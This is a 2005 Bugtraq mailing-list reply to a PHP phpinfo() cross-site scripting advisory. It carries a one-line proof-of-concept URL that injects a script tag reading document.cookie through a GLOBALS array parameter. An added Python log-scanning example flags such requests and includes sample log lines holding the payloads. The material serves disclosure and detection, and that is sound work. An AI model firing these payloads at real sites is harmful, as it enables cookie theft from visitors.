Bugtraq mailing list archives

Re: [Full-disclosure] Advisory 18/2005: PHP Cross Site Scripting (XSS) Vulnerability in phpinfo()


From: <phole () hushmail com>
Date: Thu, 3 Nov 2005 07:06:10 -0800

Great work

PoC:
phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>


This doesn't work:
phpinfo.php?test=<script>alert(document.cookie);</script>
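
A log check for the two request shapes contrasted in the message above, as an added example that is not part of the original post: it flags query parameters that carry markup and labels each as array-style (the shape of the working PoC) or scalar (the shape reported not to work). The access-log format, the sample lines and the function name `suspicious_requests` are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample lines in combined log format; not taken from the post.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Nov/2005:15:06:10 +0000] "GET /phpinfo.php?GLOBALS[test]=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 41234',
    '192.0.2.11 - - [03/Nov/2005:15:07:02 +0000] "GET /phpinfo.php?test=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 41100',
    '192.0.2.12 - - [03/Nov/2005:15:08:40 +0000] "GET /info.php?GLOBALS%5Bx%5D=%3Cimg%20src%3Dx%3E HTTP/1.1" 200 40990',
    '192.0.2.13 - - [03/Nov/2005:15:09:11 +0000] "GET /search.php?tags[]=php&tags[]=security HTTP/1.1" 200 5120',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
ARRAY_NAME_RE = re.compile(r'^[^\[\]]+\[[^\]]*\]')  # name[key] or name[]
MARKUP_RE = re.compile(r'[<>"\']')                   # characters that must be escaped in HTML output


def suspicious_requests(lines):
    """Return (path, parameter, kind) for every parameter whose decoded
    name or value contains HTML metacharacters. kind is "array" for
    name[key]-style parameters and "scalar" otherwise."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line we understand
        path, _, query = match.group(1).partition("?")
        # parse_qsl percent-decodes names and values, so %5B/%5D brackets
        # and %3C/%3E markup are seen in their decoded form.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if not MARKUP_RE.search(name + value):
                continue
            kind = "array" if ARRAY_NAME_RE.match(name) else "scalar"
            hits.append((path, name, kind))
    return hits


if __name__ == "__main__":
    for path, name, kind in suspicious_requests(SAMPLE_LOG):
        print(f"{kind:6} {path} parameter={name}")
```

Hits of kind `array` against a page that calls `phpinfo()` match the request shape of the PoC and are the ones to review first.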



